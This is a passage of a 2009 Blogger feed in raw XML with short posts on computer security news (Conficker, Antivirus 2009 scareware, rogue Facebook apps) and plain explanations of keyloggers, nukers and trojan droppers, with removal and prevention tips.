antivirus software'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mPzqYV2-K04/Se1a5ApoELI/AAAAAAAAAFY/LAja3kKajMM/s72-c/DeepFreeze.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-9073261752670259310</id><published>2009-04-17T02:47:00.001-07:00</published><updated>2009-04-17T03:07:14.924-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><category scheme='http://www.blogger.com/atom/ns#' term='computer security'/><title type='text'>Google News Alert Virus</title><content type='html'>Almost all the internet users trust Google for their services. Now the hackers are exploiting this trust. People who want to be in touch with the latest events they activate the Google News Alert. But recently a new virus emerged by the name Google News Alert.&lt;br /&gt;The virus is sent to the victim in the as email same as that of the Google news alert. When the victim opens the mail there will be an article with a link. If the victim clicks on the link, he will be taken to a website.  Then a pop-up will come informing that your system is infected with a virus. For removing the virus you have to download some anti viral softwares. The pop-up contains provision for downloading the anti-viral software. If the user allows the computer to download the anti-viral software will result in the installation of the computer virus in the victim's system.&lt;br /&gt;Due to the increasing number of cyber attack it is hard to keep the computer away from the viruses. However taking prevention will reduce the number of attacks to a great extend. So be careful in using the internet. You will get a detailed idea of the above post from:&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.fusionauthority.com/news/4763-google-news-alert-virus.htm"&gt;www.fusionauthority.com/news/4763-google-news-alert-virus.htm&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-9073261752670259310?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/9073261752670259310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/google-news-alert-virus.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/9073261752670259310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/9073261752670259310'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/google-news-alert-virus.html' title='Google News Alert Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-701538849874085070</id><published>2009-04-17T02:35:00.000-07:00</published><updated>2009-04-17T02:45:35.140-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><title type='text'>Virus attack on DPS Computer System</title><content type='html'>One of the computer systems of the Texas Department of Public Safety was infected by a virus. The virus affected internal communication systems and also some of the external communication system. The external service that got affected includes the issuance of the Texas drivers' licenses. Fortunately the database on which Texas police agencies depend for checking for identities, warrants and criminal records is unaffected by the virus. The authorities reported that about 80 percent of the offices have had the computer service restored.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-701538849874085070?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/701538849874085070/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/virus-attack-on-dps-computer-system.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/701538849874085070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/701538849874085070'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/virus-attack-on-dps-computer-system.html' title='Virus attack on DPS Computer System'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-5337504060318167483</id><published>2009-03-02T23:06:00.000-08:00</published><updated>2009-03-02T23:25:40.867-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Facebook'/><title type='text'>Facebook under attack of two malware applications</title><content type='html'>&lt;div&gt;Two malware applications are suspected to have hit Facebook in the duration of a week, possibly reading thousands of personal details. The latest application is said to be posting notifications on user's profile that say, "[Name on friend list] has just reported you to Facebook for violating our terms of service - this is your official warning. Click here to find out why you were reported." This statement will surely make the victim to click on the link. The link in the notification leads to an application named "Facebook - closing down" which, once installed, will send the same message to every one of the users' friends The &lt;a href="http://1.bp.blogspot.com/_mPzqYV2-K04/SazbUIqGIaI/AAAAAAAAAFI/NphxyriCIAk/s1600-h/fb.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5308859199730885026" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 237px" alt="" src="http://1.bp.blogspot.com/_mPzqYV2-K04/SazbUIqGIaI/AAAAAAAAAFI/NphxyriCIAk/s320/fb.jpg" border="0" /&gt;&lt;/a&gt;first application hit users over the weekend, sending out notifications to users that one of their friends had "faced some errors" when checking their profile. Users were prompted to click a link to view the error message.Facebook applications need to ask the users' permission before they can access the personal information on their profile, but the rogue application redesigned the permission-requesting page so users did not know what they were clicking on. The application then suggested that users check their friends profiles for errors, helping the application to spread. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-5337504060318167483?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/5337504060318167483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/03/facebook-under-attack-of-two-malware.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5337504060318167483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5337504060318167483'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/03/facebook-under-attack-of-two-malware.html' title='Facebook under attack of two malware applications'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mPzqYV2-K04/SazbUIqGIaI/AAAAAAAAAFI/NphxyriCIAk/s72-c/fb.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-5303079190741379747</id><published>2009-02-24T23:06:00.000-08:00</published><updated>2009-02-24T23:33:06.217-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><title type='text'>Keylogger Trojan</title><content type='html'>Keylogger Trojan is a malicious program that steals your user name and password and logging them to a file and send to the attackers. Some keyloggers are available in the market for buying. They are generally used by the parents to track the online activities of their children and also by the people who want to track the contacts and online activities of their life partner. Some keyloggers are capable of monitering your web browser. If a desired responce is found it tracks the required information and sent to the remote attacker. The desired responce may be the opening of a site of the bank in which you may have a account. Some sites requires pointing by mouse rather than the keystrokes. This reduces some of the attack. But some trojans send the screenshot of the victims application to the remote attacker.&lt;br /&gt;               The keyloggers are installed in the victim's machine by making him belive that they are useful software. The most of the infection are through the P to P network.&lt;br /&gt;             To avoid the infection connect only to trusted network. Download softwares only from trusted sources. Use an updated Antivirus software and install a firewall.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-5303079190741379747?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/5303079190741379747/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/keylogger-trojan.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5303079190741379747'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5303079190741379747'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/keylogger-trojan.html' title='Keylogger Trojan'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7485573385602146299</id><published>2009-02-20T19:17:00.000-08:00</published><updated>2009-02-20T20:22:14.804-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='nuker'/><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><title type='text'>Nuker</title><content type='html'>Nuker is a trojan that allows attacker to reboot, shut down or even crash the victim's computer which is connected to the internet. In most cases the nuker requires only the IP address of the target computer. When the attacker enters the IP address of the victim, the nuker sends some packets that made the victim's computer to restart, shut down or even to crash.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 255);font-size:130%;" &gt;Removal of Nuker&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The removal of Nuker is not so difficult. Most of the anti viruses available in the market is able to delete the Nukers. It can also be deleted manually. For manually disinfecting the nuker, we have to approach in different methods for different Operating Systems. The best way is to delete the malware manually and to reboot the computer. In Windows 9x and millenium Operating Systems just go to the command prompt and delete the file using the command DEL. &lt;span style="font-style: italic;"&gt;eg.&lt;/span&gt; if the file name is nuke.exe in the windows folder, then just type:&lt;br /&gt;&lt;span style="font-family:Arial, sans-serif;font-size:-1;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000040;"&gt;                                                   DEL C:\WINDOWS\NUKE.EXE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;and press ENTER key. Then reboot the system.&lt;br /&gt;The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.&lt;br /&gt;&lt;br /&gt;In the case of Windows NT, 2000, XP the first thing to be done is to rename (including its extension) the nuker and then restart the computer and then delete the file manually.&lt;br /&gt;&lt;br /&gt;The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.&lt;br /&gt;&lt;br /&gt;Note that you have to disable the system restore before manual disinfection. While renaming the file the Operating System will copy the original files to another folder for back up. This may result in the disinfection failure. So system restore must be disabled.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001012513122239?OpenDocument&amp;amp;src=sec_doc_nam"&gt;Disable or enable Windows Me System Restore&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001111912274039?OpenDocument&amp;amp;src=sec_doc_nam"&gt;Disable or enable Windows XP System Restore&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7485573385602146299?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7485573385602146299/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/nuker.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7485573385602146299'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7485573385602146299'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/nuker.html' title='Nuker'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2841895616290265124</id><published>2009-02-19T23:15:00.000-08:00</published><updated>2009-02-19T23:56:48.239-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Autoruns'/><category scheme='http://www.blogger.com/atom/ns#' term='dropper'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='disabling autoruns'/><title type='text'>Trojan. Dropper</title><content type='html'>&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/_mPzqYV2-K04/SZ5hPwrYPtI/AAAAAAAAAEw/AzrIP-liJY8/s1600-h/trojan.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Trojan. Droppers are trojans that instals in a system without the informing the user about their presence. Usually virus writers and hackers create trojan droppers to install other applications or placing the backdoor applications. It was discovered in february 2000. It is also known as virus.dropper. It affects Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP. However the threat level is low and can be easily removed.&lt;/div&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_mPzqYV2-K04/SZ5iKhkKrSI/AAAAAAAAAFA/IqppwTIN1fY/s1600-h/trojan.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5304785344037301538" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 78px; CURSOR: hand; HEIGHT: 103px" alt="" src="http://1.bp.blogspot.com/_mPzqYV2-K04/SZ5iKhkKrSI/AAAAAAAAAFA/IqppwTIN1fY/s320/trojan.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;However prevention will reduce the risk of infection. Some of the preventive measures are given below:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Use a firewall to block all the applications that are trying to connect the internet without your permission. This will reduce the risk even after the infection.&lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Isolate the infected computers quickly to prevent the trojan from spreading further. Perform a forensic analysis and restore the computers using trusted anti-trojan software. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Enforce a password policy. Complex passwords make it difficult to crack password files on infected computers. This helps to prevent or limit damage when a computer is infected. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://creatingcomputervirus.blogspot.com/2009/01/disable-autoruns-in-xp-and-vista.html"&gt;Disable AutoPlay &lt;/a&gt;to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. I have put a post on &lt;a href="http://creatingcomputervirus.blogspot.com/2009/01/disable-autoruns-in-xp-and-vista.html"&gt;disabling the autoplay in XP and vista&lt;/a&gt; earlier.&lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.&lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched. &lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;It is recommended to disable the system restore. You will get more information about enabling and diabling the system restore XP and other OS. &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001012513122239?OpenDocument&amp;amp;src=sec_doc_nam"&gt;Disable or enable Windows Me System Restore&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001111912274039?OpenDocument&amp;amp;src=sec_doc_nam"&gt;Disable or enable Windows XP System Restore&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2841895616290265124?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2841895616290265124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/trojan-dropper.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2841895616290265124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2841895616290265124'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/trojan-dropper.html' title='Trojan. Dropper'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mPzqYV2-K04/SZ5iKhkKrSI/AAAAAAAAAFA/IqppwTIN1fY/s72-c/trojan.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6633003432680177618</id><published>2009-02-19T01:31:00.000-08:00</published><updated>2009-02-19T01:46:06.213-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><category scheme='http://www.blogger.com/atom/ns#' term='french fighter'/><title type='text'>French Fighters Grounded by Computer Virus</title><content type='html'>&lt;div&gt;The recent incidences shows that even the most systems that we think to be highly secured are vulnerable to virus attacks. The incident in which the French Navy's fighter planes were unable to download their fight plans as the databases were attacked by a Microsoft virus. &lt;img id="BLOGGER_PHOTO_ID_5304442344725176514" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 196px; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SZ0qNVjiYMI/AAAAAAAAAEo/ZMxOTQdXqFA/s320/tt.gif" border="0" /&gt;&lt;/div&gt;&lt;div&gt;However, the French navy admitted that during the time it took to disinfect the virusThe incident forced the defence authorities to use the traditional systems like telephone, fax and post. Naval officials said the infection was probably due more to negligence than a deliberate attempt to compromise French national security. It said it suspected someone at the navy had used an infected USB key&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6633003432680177618?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6633003432680177618/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/french-fighters-grounded-by-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6633003432680177618'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6633003432680177618'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/french-fighters-grounded-by-computer.html' title='French Fighters Grounded by Computer Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mPzqYV2-K04/SZ0qNVjiYMI/AAAAAAAAAEo/ZMxOTQdXqFA/s72-c/tt.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4966524192134725283</id><published>2009-02-18T23:13:00.000-08:00</published><updated>2009-02-18T23:20:38.511-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='new virus'/><category scheme='http://www.blogger.com/atom/ns#' term='antivirus 2009'/><title type='text'>Antivirus 2009- A new virus</title><content type='html'>&lt;div&gt;&lt;br /&gt;A new threat that comes disguised as a genuine antivirus program has become&lt;br /&gt;increasingly prevalent . Offering to scan and remove malware from your&lt;br /&gt;PC, this rogue will actually install a Trojan on your unsuspecting system. The process is usually initiated when you click a link for what you believe is valid security software or its vendor's site.&lt;br /&gt;Such adverts are not only a nuisance when browsing online -- fake ads appear on reputable sites that make use of third-party advertising -- but they are designed to rip off consumers by tempting them to pay for a wort&lt;a href="http://3.bp.blogspot.com/_mPzqYV2-K04/SZ0Hqas6zYI/AAAAAAAAAEY/DAUpOUx6yzk/s1600-h/antivirus-2009.jpg"&gt;&lt;/a&gt;hless program.&lt;img id="BLOGGER_PHOTO_ID_5304404808153767218" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 240px; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SZ0IEa7hHTI/AAAAAAAAAEg/yEz5c-n4NQY/s320/scrsht003.jpg" border="0" /&gt; Worse still, these rogue applications infect your PC with a problem they claim can only be 'fixed' by purchasing extra software.&lt;br /&gt;&lt;br /&gt;If you have fallen victim to this virus hoax, stop by the Help Desk immediately to reserve time for virus removal from your system.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4966524192134725283?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4966524192134725283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/antivirus-2009-new-virus.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4966524192134725283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4966524192134725283'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/antivirus-2009-new-virus.html' title='Antivirus 2009- A new virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/SZ0IEa7hHTI/AAAAAAAAAEg/yEz5c-n4NQY/s72-c/scrsht003.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7787138858573150794</id><published>2009-02-17T23:13:00.000-08:00</published><updated>2009-02-17T23:17:56.827-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Mysterious'/><category scheme='http://www.blogger.com/atom/ns#' term='sleeper'/><title type='text'>Mysterious New Computer Virus May Be 'Sleeper' Agent</title><content type='html'>A computer virus that may leave Microsoft Windows users vulnerable to digital hijacking is spreading through companies in the U.S., Europe and Asia, already infecting close to 9 million machines, according to a private online security firm.&lt;br /&gt;&lt;br /&gt;Though computer bugs have become a common affliction, Finland-based F-Secure says a virus it has been tracking for the past several weeks has surged more rapidly through corporate networks than anything they've seen in years. But the virus doesn't appear to be working as its designers intended.&lt;br /&gt;&lt;br /&gt;F-Secure's chief security adviser, Patrik Runald, said the virus's coding suggests a type of bug that alerts computer users to bogus infections on their machines and offers to help by selling them antivirus software. Instead, the virus is simply spreading to little effect, though it may still pose a threat to infected computers.&lt;br /&gt;&lt;br /&gt;Microsoft issued a security update Tuesday to deal with the so-called "Downadup" or "Conficker" virus, which appears to be a new version of a bug that popped up in October. "Over the last couple of weeks, a new variant of this worm has been affecting customers," the company acknowledged in a blog post.&lt;br /&gt;&lt;br /&gt;Microsoft said the virus is spreading by gaining access to one computer and then guessing at passwords of other users in the same network: "If the password is weak, it may succeed."&lt;br /&gt;&lt;br /&gt;A company representative couldn't immediately be reached Saturday to comment on F-Secure's estimate of infected machines. Most computers with Windows will automatically download Microsoft's security update, but Hypponen said the virus disables updates on infected machines. While the origin of the virus is a mystery, F-Secure's best guess is it came from Ukraine.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7787138858573150794?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7787138858573150794/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/mysterious-new-computer-virus-may-be.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7787138858573150794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7787138858573150794'/><link rel='alternate' type='text/html' 